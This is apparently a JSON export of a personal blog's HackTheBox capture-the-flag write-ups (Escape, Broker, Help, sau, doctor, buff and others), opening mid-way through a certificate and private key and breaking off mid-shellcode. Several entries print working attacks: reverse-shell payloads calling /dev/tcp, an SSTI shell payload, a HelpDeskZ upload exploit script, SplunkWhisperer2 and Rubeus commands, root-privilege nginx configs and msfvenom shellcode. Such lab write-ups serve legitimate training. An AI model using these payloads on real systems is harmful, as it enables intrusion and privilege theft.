3ZuP4nvrBEPW1JPD7w/AXrNl7R4NaEt0VOJemoPUZxd2Rwo7vS8= -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIGEjCCBPqgAwIBAgITHgAAAA7IG3/8jzhppQAAAAAADjANBgkqhkiG9w0BAQsF ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjUxMjI2MjM1NjUxWhcNMzUxMjI0 MjM1NjUxWjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCawy5AummNhWDDj/+amP8/9D7S IhJXWyUha3KfamD523JTc0SBJiqW/FzLry04VtPfw3iIVFp4uNiDJhmdwrGGQgxt ROFMIw4x1CbzuY10/C4/k0E1l0/tOKdbdiPrVqE3xzrVfHM2vqSNWjbjjTCNWkUI WQKFvKLcTRd3Zh6pDhuHCqKboI2f5HOlSDDn6cTkOwJPJj+MLzRqTYGF4jsOPU8A KwQoq6ZWpTUguf6COlFJm+zMP8FkyDqduas2F7zyv/CzhOjItCoZQI3HS17LfsxW tOg3ikQsnjgKMl/XqD2q/BGoRybpVlpyuj5drlkyqYmjvgxWxixlPkA//S4tAgMB AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9 lTWDv8NZg4nKNYF338oIhp7sKQIBZQIBBDApBgNVHSUEIjAgBggrBgEFBQcDAgYI KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFIVI3t82owCTX23c+/KlYh3gML5r MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1hZG1pbmlzdHJhdG9yMB8GA1Ud IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049 QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/ b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF AAOCAQEASsm0sZtW1s0P3jLMuFrW8UxwrES9hH8GLDNT6vs05PyU9Ib84nW3BmYy YigNZaH4erDi4QU6yniPlj8n/SMEXvKT3vntsswDvMZoX4IzX6qw1uHUDsNNxY+7 9tgtnnhtueuQoqfif0d9xmSezrAj5Ovk7ohYUzwessK6Ldy5uSEesrscGKMllIiv 3vn8i0Vv0/CJdFmp6u5dofGEs9WQr80JfrRxJ3ih+Ne6fdaHfoxLXDHbqmj/o4XM v0zY6YoBKhfNzz1/CUg8QZjZTlHfFZWJh6u67//h3V05bUsGmHl4F82QgLjixL1k hQA5BYlWSgdWM6ChUN2gRCoXF1VPTQ== -----END CERTIFICATE----- [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP \u0026#34;Microsoft Enhanced Cryptographic Provider v1.0\u0026#34; -export -out cert.pfx with this cert we request for a ticket in the name of administrator using rubeus\nif we dump the hash aswell with\nEvil-WinRM PS C:\\Users\\Ryan.Cooper\\Documents\u0026gt; .\\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /show /nowrap\nwe get this\nand we are in with the ntlm hash that we got\n","date":"25 December 2025","externalUrl":null,"permalink":"/ctf-writeups/ad-escape/","section":"CTF Writeups","summary":"","title":"[AD] Escape","type":"ctf-writeups"},{"content":" Broker # Overview # OS: Linux IP: 10.129.230.87 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Gained access with RCE exploit that for activemq that trusts a xml file easily, and then priv esc with sudo perms over being able to upload a nginx config file.\nEnumeration # nmap scan results\non visiting the site we are prompted with a portal, when we try default admin/admin we get access to the manager portal\nlets get javac with\nsudo apt install default-jdk -sudo apt install default-jdk -y Vulnerabilities # Exploitation # lets grab the exploit\ngit clone https://github.com/evkl1d/CVE-2023-46604.git to run this exploit we need to provide a xml rev shell that the server will deserialize and hopefully run the bad code.\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;UTF-8\u0026#34; ?\u0026gt; \u0026lt;beans xmlns=\u0026#34;http://www.springframework.org/schema/beans\u0026#34; xmlns:xsi=\u0026#34;http://www.w3.org/2001/XMLSchema-instance\u0026#34; xsi:schemaLocation=\u0026#34; http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd\u0026#34;\u0026gt; \u0026lt;bean id=\u0026#34;pb\u0026#34; class=\u0026#34;java.lang.ProcessBuilder\u0026#34; init-method=\u0026#34;start\u0026#34;\u0026gt; \u0026lt;constructor-arg\u0026gt; \u0026lt;list\u0026gt; \u0026lt;value\u0026gt;bash\u0026lt;/value\u0026gt; \u0026lt;value\u0026gt;-c\u0026lt;/value\u0026gt; \u0026lt;value\u0026gt;bash -i \u0026amp;gt;\u0026amp;amp; /dev/tcp/10.10.10.10/9001 0\u0026amp;gt;\u0026amp;amp;1\u0026lt;/value\u0026gt; \u0026lt;/list\u0026gt; \u0026lt;/constructor-arg\u0026gt; \u0026lt;/bean\u0026gt; \u0026lt;/beans\u0026gt; with this we get our rev shell\nwe can run this binary with full perms\nwe will use a malicious config file and elevate our privs with nginx\nnano /tmp/root.conf\nuser root; worker_processes 1; events { worker_connections 1024; } http { server { listen 9001; location / { root /; } } } sudo /usr/sbin/nginx -c /tmp/root.conf\nand now we can grab the root flag file\n","date":"20 December 2025","externalUrl":null,"permalink":"/ctf-writeups/broker/","section":"CTF Writeups","summary":"","title":"Broker","type":"ctf-writeups"},{"content":" Intentions # Overview # OS: Linux IP: 10.129.229.27 Difficulty: Hard Platform: HackTheBox OSCP: Yes Lists: N/A Summary # This writeup covers the full attack path for Intentions, including enumeration, exploitation, and privilege escalation.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\nPort 80\nDirsearch\nVulnerabilities # Exploitation # ","date":"20 December 2025","externalUrl":null,"permalink":"/ctf-writeups/intentions/","section":"CTF Writeups","summary":"","title":"Intentions","type":"ctf-writeups"},{"content":" Help # Overview # OS: Linux IP: 10.129.230.159 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Gained access with php reverseshell, timezone, privesc with linuxexploitsugg.\nEnumeration # Nmap results\nPort 3000\nNow that we know we have graphql lets perform enum\nMention content type for json content\nhttps://github.com/ivanversluis/pentest-hacktricks/blob/master/pentesting/pentesting-web/graphql.md\nwe find instropection query from this blog\n{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}\nhttps://www.yeswehack.com/learn-bug-bounty/hacking-graphql-endpoints\nWe find User object with parameters username and password\non quering the user object\n5d3c93182bb20f07b994a7f617e99cff\nlets visit ntlm.pw to get the clear text pass godhelpmeplz is the password\nhelpme@helpme.com\nsupport site we visited with dirsearch\nwe find the helpdeskz version from the readme directory we got by brute forcing\nVulnerabilities # Helpdeskz version 1.0.2\nlets get our reverseshell in php and upload it through the ticket\nExploitation # this is our timezone\nwe update our rpeference in the site to this timezone\nexploit.py\nnow we can use this code\nimport hashlib import time import sys import requests print \u0026#39;Helpdeskz v1.0.2 - Unauthenticated shell upload exploit\u0026#39; if len(sys.argv) \u0026lt; 3: print \u0026#34;Usage: {} [baseUrl] [nameOfUploadedFile]\u0026#34;.format(sys.argv[0]) sys.exit(1) helpdeskzBaseUrl = sys.argv[1] fileName = sys.argv[2] currentTime = int(time.time()) for x in range(0, 300): plaintext = fileName + str(currentTime - x) md5hash = hashlib.md5(plaintext).hexdigest() url = helpdeskzBaseUrl+\u0026#39;/uploads/tickets/\u0026#39;+md5hash+\u0026#39;.php\u0026#39; response = requests.head(url) if response.status_code == 200: print \u0026#34;found!\u0026#34; print url sys.exit(0) print \u0026#34;Sorry, I did not find anything\u0026#34; First we upload the file on the ticket submission portal and get file not allowed, after that we run the exploit and get a php shell with which we spawn a python rev shell\nPrivesc we host a simple python server with\npython3 -m http.server 80 and then we use wget to get linpeas on the system for privesc\nwe get dirty cow on our system and boom root ( this was supposed to be the case, but the user with dirty cow didnt work so we had to use another linux exploit )\nLinux Kernel \u0026lt; 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation\n","date":"17 December 2025","externalUrl":null,"permalink":"/ctf-writeups/help/","section":"CTF Writeups","summary":"","title":"Help","type":"ctf-writeups"},{"content":" sau # Overview # OS: Linux IP: 10.129.229.26 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # SSRF practice + RCE followed with pager based shell escape for root access.\nLoot # | ssh-hostkey: | 3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA) | 256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA) |_ 256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)\nEnumeration Nmap scan Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-15 10:39 EST Nmap scan report for 10.129.229.26 Host is up (0.19s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) 80/tcp filtered http 55555/tcp open unknown | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 400 Bad Request | Content-Type: text/plain; charset=utf-8 | X-Content-Type-Options: nosniff | Date: Mon, 15 Dec 2025 15:40:21 GMT | Content-Length: 75 | invalid basket name; the name does not match pattern: ^[wd-_\\.]{1,250}$ | GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 302 Found | Content-Type: text/html; charset=utf-8 | Location: /web | Date: Mon, 15 Dec 2025 15:39:51 GMT | Content-Length: 27 | href=\u0026#34;/web\u0026#34;\u0026gt;Found\u0026lt;/a\u0026gt;. | HTTPOptions: | HTTP/1.0 200 OK | Allow: GET, OPTIONS | Date: Mon, 15 Dec 2025 15:39:52 GMT |_ Content-Length: 0 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port55555-TCP:V=7.94SVN%I=7%D=12/15%Time=69402BC6%P=x86_64-pc-linux-gnu SF:%r(GetRequest,A2,\u0026#34;HTTP/1\\.0\\x20302\\x20Found\\r\\nContent-Type:\\x20text/ht SF:ml;\\x20charset=utf-8\\r\\nLocation:\\x20/web\\r\\nDate:\\x20Mon,\\x2015\\x20Dec SF:\\x202025\\x2015:39:51\\x20GMT\\r\\nContent-Length:\\x2027\\r\\n\\r\\n\u0026lt;a\\x20href= SF:\\\u0026#34;/web\\\u0026#34;\u0026gt;Found\u0026lt;/a\u0026gt;\\.\\n\\n\u0026#34;)%r(GenericLines,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x SF:20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnectio SF:n:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(HTTPOptions,60,\u0026#34;HTTP/1\\.0\\ SF:x20200\\x20OK\\r\\nAllow:\\x20GET,\\x20OPTIONS\\r\\nDate:\\x20Mon,\\x2015\\x20Dec SF:\\x202025\\x2015:39:52\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPReq SF:uest,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/pl SF:ain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Requ SF:est\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x2 SF:0text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad SF:\\x20Request\u0026#34;)%r(SSLSessionReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\ SF:nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\ SF:r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TerminalServerCookie,67,\u0026#34;HTTP/1\\.1\\x20 SF:400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\ SF:r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TLSSessionReq, SF:67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\ SF:x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;) SF:%r(Kerberos,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20 SF:text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\ SF:x20Request\u0026#34;)%r(FourOhFourRequest,EA,\u0026#34;HTTP/1\\.0\\x20400\\x20Bad\\x20Request SF:\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nX-Content-Type-Opt SF:ions:\\x20nosniff\\r\\nDate:\\x20Mon,\\x2015\\x20Dec\\x202025\\x2015:40:21\\x20G SF:MT\\r\\nContent-Length:\\x2075\\r\\n\\r\\ninvalid\\x20basket\\x20name;\\x20the\\x2 SF:0name\\x20does\\x20not\\x20match\\x20pattern:\\x20\\^\\[\\\\w\\\\d\\\\-_\\\\\\.\\]{1,250 SF:}\\$\\n\u0026#34;)%r(LPDString,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-T SF:ype:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400 SF:\\x20Bad\\x20Request\u0026#34;)%r(LDAPSearchReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Req SF:uest\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x2 SF:0close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 8888/tcp) HOP RTT ADDRESS 1 188.02 ms 10.10.14.1 2 188.10 ms 10.129.229.26 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 122.80 seconds Dir we notice that it is powered by a version\nUser creates basket, basket ui now tracks requests to the page created and displays it\nVulnerability Public cve exploit\nwget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh\nWill help us forge a SSRF\nExploitation now on visiting this we are able to view the content of the filtered port 80\nfound RCE exploit for this version\nNow lets grab the flags\nPrivesc systemctl status pipes output to a pager:\nPager = less (by default) less allows shell escape with ! When run via sudo → shell runs as root So you escalate from a read-only command via the pager.\n","date":"15 December 2025","externalUrl":null,"permalink":"/ctf-writeups/sau/","section":"CTF Writeups","summary":"","title":"sau","type":"ctf-writeups"},{"content":" irked # Overview # OS: Linux IP: 10.10.10.117 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # Enumerated box irked, found a backdoor exploit for service UnrealIRCd , got a shell, got password to some steg backup, learnt to use the tool steghide to pull information from a image which allowed me to ssh into the box , elevated priv to root using a suid binary called viewusers.\nEnumeration # Nmap scan results\nbecause htb asks us whats running on port 8067, lets check that also out since this scan did not give us that port back.\nhomepage\ndirbusting\n/man page\nVulnerabilities # Exploitation # ok so on inspecting the backdoor vulnerability we found earlier, we notice that the way the exploit worksis by starting off the payload with AB in the string , this makes it so that the pc that we are attacking recognizes it is a system command, this could lead us to a rev shell so lets try it out\nwe first setup our traffic monitor\nok so it works\nlets get our rev shell now\nand we have our shell\nwe dont have the perms to view the user flag so lets do some priv esc\nwe find the password of some super elite backup??\nUPupDOWNdownLRlrBAbaSSss\nsince it seems to be referencing to steg , letsuse the steghide tool on the image which was on the homepage\nlets try switching to the other user with this password now\nok so using su directly did not work\nbut we were able to log in via ssh\nwe got our user flag, now lets try elevating for grabbing the root flag\nwe hsot linpeas from our box using a simple python server and then use wget to grab it.\nwe find something called /usr/bin/viewuser which looks interesting, lets try running it\nThis binary had a SUID (Set owner User ID) flag set. It basically meaned anyone who run the application would be given a temporary privilege as the owner of the file/program. As the owner of this file is root, our user would be given a temporary permission as a root. -@rblayke1\nit gives us an error saying not found\nok so it was looing for a listusers tfile to execute, we created our own listusers file with the bash shell that we need, it executes that as root and gives us a root shell.\nroot flag\n","date":"29 September 2024","externalUrl":null,"permalink":"/ctf-writeups/irked/","section":"CTF Writeups","summary":"","title":"irked","type":"ctf-writeups"},{"content":" remote # Overview # OS: Windows IP: 10.10.10.180 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # learnt how to mount something using nfs, used hashcat to crack admin creds which i found from the backup file in the mount, used an authenticated rce exploit to get nc.exe on the box with powershell and then got a basic shell, learnt to escalate privs by exploiting the self-impersonate priv using printspoofer.exe.\nEnumeration # nmap scan results\nhomepage\nlogin portal\non a bit of enumerating we find this portal\nVulnerabilites Exploitation # since nfs is running on the box , lets check for mounts\nok there is something called site_backups, lets check it out\nPoking around a bit, there’s an .sdf file in /App_Data called Umbraco.sdf. .sdf files are standard database format files. I don’t know a great way to parse these files, but strings shows some interesting results right at the top of the file: -0xdf\nby looking at this we can make out the user is\nemail admin@htb.local\nand the password hash is\nb8be16afba8c314ad33d812f22a04991b90e2aaa with SHA1\nand another user smith with password hash jxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts\nstored using HMACSHA256.\nok so when we break it with hashcat we find that the pass is baconandcheese\nthese creds let us in\nwe can now try this vuln we found earlier\non trying a simple whoami command\nnice, we have RCE\nlets get nc.exe via powershell\nannnd we have our user flag\nnow lets try priv esc\nlets exploit this by using printspoofer\nGitHub - itm4n/PrintSpoofer: Abusing impersonation privileges through the \u0026ldquo;Printer Bug\u0026rdquo;\nlets get this printspoofer on our system as print.exe how we got our nc\ntime to grab our root flag\npwned\n","date":"29 September 2024","externalUrl":null,"permalink":"/ctf-writeups/remote/","section":"CTF Writeups","summary":"","title":"remote","type":"ctf-writeups"},{"content":" knife # Overview # OS: Linux IP: 10.10.10.242 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # User agentt exploit.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\nhomepage + php version\nVulnerabilities # I validated this step using the evidence below before moving forward in the chain.\nExploitation # lets use the UserAgentt Exploit\nand just like that we have our shell\nok so we got a shell as james and we can run /usr/bin/knife as root?\nthis shell we got is very unstable i cant even traverse directories , lets try getting it manually without the use of this script.\nsending this request via burpsuite, gets us our shell\nlets use this exploit to upgrade our shell sudo knife exec -E \u0026ldquo;exec \u0026lsquo;/bin/bash\u0026rsquo;\u0026rdquo;\nuser and root flag\n","date":"21 September 2024","externalUrl":null,"permalink":"/ctf-writeups/knife/","section":"CTF Writeups","summary":"","title":"knife","type":"ctf-writeups"},{"content":" Mirai # Overview # OS: Linux IP: 10.10.10.48 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # learnt how to recover data that was deleted from a usb stick, also learnt how to check for devices that are mounted.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\ndirsearch\n.admin\nVulnerabilities # Exploitation # lets try the raspberry pi default creds nd try to login thru ssh\nand boom wee are in\nand we have our user flag\nsuprisingly we can run any command as root, so lets get a root shell with sudo su -\nok so it seems to be on a usb stick?\nnice , we have to perform some recovery\nstrings /dev/sdb -n 32 will grab us the root flag assuming that when the flag was deleted it was not overwritten with nullvalues and instead the metadata was just removed.\n\\and boom root flag\npwned\n","date":"20 September 2024","externalUrl":null,"permalink":"/ctf-writeups/mirai/","section":"CTF Writeups","summary":"","title":"Mirai","type":"ctf-writeups"},{"content":" Devoops # Overview # OS: Linux IP: 10.10.10.x Difficulty: Medium Platform: HackTheBox OSCP: No Lists: N/A Summary # -.\nEnumeration # Vulnerabilities # Exploitation # ","date":"14 September 2024","externalUrl":null,"permalink":"/ctf-writeups/devoops/","section":"CTF Writeups","summary":"","title":"Devoops","type":"ctf-writeups"},{"content":" doctor # Overview # OS: Linux IP: 10.10.10.209 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # learnt how to exploit this using ssti ( server side template injection ), used a splunk exploit called splunkwhisperer2 to get root shell.\nEnumeration # nmap scan results\ndirsearch\nnothing too useful\nchecking out port 8089\nwe find here that the version of splunk that is running is 8.0.5\nwe also notice that there could be a domain with the name doctors.htb\nlets add this to our /etc/hosts file and visit it\nand oop we got a login page on this site, this may be useful later on\nVulnerability Exploitation # the admin login panel page had a place where we could sign up , lets do that\nand we come across this page where we can create new posts\nok we put up a test post, now lets look around more\non looking at the source page we can tell that there is a directory that exists called /archive\nthe page shows nothing\nbut the source code shows us this\nso whatever we post is being reflected here\nlets try a ssti a temp injection\nssti :- server side template injection\nhere is our ssti chart\nlets try posting this, if its vulnerable then it should show 5 , 5 times in the archive.\nand it does, lets try a ssti rev shell payload now\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/README.md\nwe can use this one\n{% for x in ().__class__.__base__.__subclasses__() %}{% if \u0026#34;warning\u0026#34; in x.__name__ %}{{x()._module.__builtins__[\u0026#39;__import__\u0026#39;](\u0026#39;os\u0026#39;).popen(\u0026#34;python3 -c \u0026#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\u0026#34;ip\\\u0026#34;,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\u0026#34;/bin/cat\\\u0026#34;, \\\u0026#34;flag.txt\\\u0026#34;]);\u0026#39;\u0026#34;).read().zfill(417)}}{%endif%}{% endfor %} we have to make some tweaks like specifying our ip nd changing cat to bash alongwith the -i command for a stable shell\nnow after we post it, we trigger the payload by refreshing the archive page, but remember to setup ur netcat first\nand there we go, we have our basic shell\nookk so we dont even have the perms for viewing a user file.\nlets get linpeas on the box and try to escalate our privs.\nafter changing the perms of linpeas with chmod x linpeas.sh\nwe run it with ./linpeas.sh\nnow lets see if we find anything interersting\nok so we find a password from the logs that is Guitar123 and we know that a user exists with the name shaun.\nlets try these credentials on ssh\ndoes noooot seem to work, lets try on our prev shell with su\nand we are in, lets grab our user flag first\nnow lets go for escalating for our root flag\nremember we had come across a splunk page on port 8089 before? lets visit that now\nlets try these creds here aswell\nand wow it worked\nok cool we can now start to use the splunkwhisperer2 payload we found earlier\ngit clone tis https://github.com/cnotin/SplunkWhisperer2.git\nlets use remote and exec a rev shell payload\nwe will use this payload bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.39/8080 0\u0026gt;\u0026amp;1\npython3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.39 --username shaun --password Guitar123 --payload \u0026#34;bash -c \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.39/8080 0\u0026gt;\u0026amp;1\u0026#39;\u0026#34; annnnd we have our root shell\nok now time to grab the flag\nroot flag\n","date":"7 September 2024","externalUrl":null,"permalink":"/ctf-writeups/doctor/","section":"CTF Writeups","summary":"","title":"doctor","type":"ctf-writeups"},{"content":" buff # Overview # OS: Windows IP: 10.10.10.198 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # learnt how to portforward with chisel, update buffer exploit with own payload.\nEnumeration # nmap scan result\nlets add 10.10.10.198 to our hosts\ndirsearch results\nhomepage\ncontact page contents\nVulnerability gym management\nExploitation # alright so using the unauthenticated remote code execution exploit\nwe have gotten ourselves a foothold\nlets upgrade our shell by first getting nc.exe on our box\nusing nc now\nnow that we got our shell lets get our user flag\nUser Flag\nrunnign netsat -an gives us this\nwe notice that there is something running on ports 8888 and 3306\nwe also find this executable file in shauns downloads folder.\nrunnign tasklist/v shows us that cloudme is running right now\nfor cloudme we find this exploit\nhttps://www.exploit-db.com/exploits/48389\nwhich runs only on a port that can only be locally accessed rn, port 8888.\nlets use Chisel to portforward our targets port 8888 to our kali machines port 8888\nlets go here https://github.com/jpillora/chisel/releases\nand grab this\nlets grab for windows as well\ngunzip both of them and give them perms with chmod\nnow get the windows one on the box\nnow on our kali box we will run this\n./chisel_1.6.0_linux_amd64 server -p 8000 \u0026ndash;reverse\nand on our buff bxo we run this\nchisel.exe client 10.10.14.20:8000 R:8888:localhost:8888\nnice we got our connection\nnetstat -anlp | grep 8888\nthis will tell us if it is connected\nand yup we are\nok now lets look at the exploits available for cloudme\nlets use the first one which is the buffer overflow proof of concept\nok so apparently only the shellcode needs to be updated\nlets generate one using msfvenom\nmsfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.23 LPORT=443 -b \u0026lsquo;\\x00\\x0A\\x0D\u0026rsquo; -f python -v payload\npayload = b\u0026#34;\u0026#34; payload += b\u0026#34;\\xbd\\x5c\\x4f\\xd7\\xd9\\xda\\xda\\xd9\\x74\\x24\\xf4\u0026#34; payload += b\u0026#34;\\x58\\x33\\xc9\\xb1\\x52\\x31\\x68\\x12\\x03\\x68\\x12\u0026#34; payload += b\u0026#34;\\x83\\x9c\\x4b\\x35\\x2c\\xe0\\xbc\\x3b\\xcf\\x18\\x3d\u0026#34; payload += b\u0026#34;\\x5c\\x59\\xfd\\x0c\\x5c\\x3d\\x76\\x3e\\x6c\\x35\\xda\u0026#34; payload += b\u0026#34;\\xb3\\x07\\x1b\\xce\\x40\\x65\\xb4\\xe1\\xe1\\xc0\\xe2\u0026#34; payload += b\u0026#34;\\xcc\\xf2\\x79\\xd6\\x4f\\x71\\x80\\x0b\\xaf\\x48\\x4b\u0026#34; payload += b\u0026#34;\\x5e\\xae\\x8d\\xb6\\x93\\xe2\\x46\\xbc\\x06\\x12\\xe2\u0026#34; payload += b\u0026#34;\\x88\\x9a\\x99\\xb8\\x1d\\x9b\\x7e\\x08\\x1f\\x8a\\xd1\u0026#34; payload += b\u0026#34;\\x02\\x46\\x0c\\xd0\\xc7\\xf2\\x05\\xca\\x04\\x3e\\xdf\u0026#34; payload += b\u0026#34;\\x61\\xfe\\xb4\\xde\\xa3\\xce\\x35\\x4c\\x8a\\xfe\\xc7\u0026#34; payload += b\u0026#34;\\x8c\\xcb\\x39\\x38\\xfb\\x25\\x3a\\xc5\\xfc\\xf2\\x40\u0026#34; payload += b\u0026#34;\\x11\\x88\\xe0\\xe3\\xd2\\x2a\\xcc\\x12\\x36\\xac\\x87\u0026#34; payload += b\u0026#34;\\x19\\xf3\\xba\\xcf\\x3d\\x02\\x6e\\x64\\x39\\x8f\\x91\u0026#34; payload += b\u0026#34;\\xaa\\xcb\\xcb\\xb5\\x6e\\x97\\x88\\xd4\\x37\\x7d\\x7e\u0026#34; payload += b\u0026#34;\\xe8\\x27\\xde\\xdf\\x4c\\x2c\\xf3\\x34\\xfd\\x6f\\x9c\u0026#34; payload += b\u0026#34;\\xf9\\xcc\\x8f\\x5c\\x96\\x47\\xfc\\x6e\\x39\\xfc\\x6a\u0026#34; payload += b\u0026#34;\\xc3\\xb2\\xda\\x6d\\x24\\xe9\\x9b\\xe1\\xdb\\x12\\xdc\u0026#34; payload += b\u0026#34;\\x28\\x18\\x46\\x8c\\x42\\x89\\xe7\\x47\\x92\\x36\\x32\u0026#34; payload += 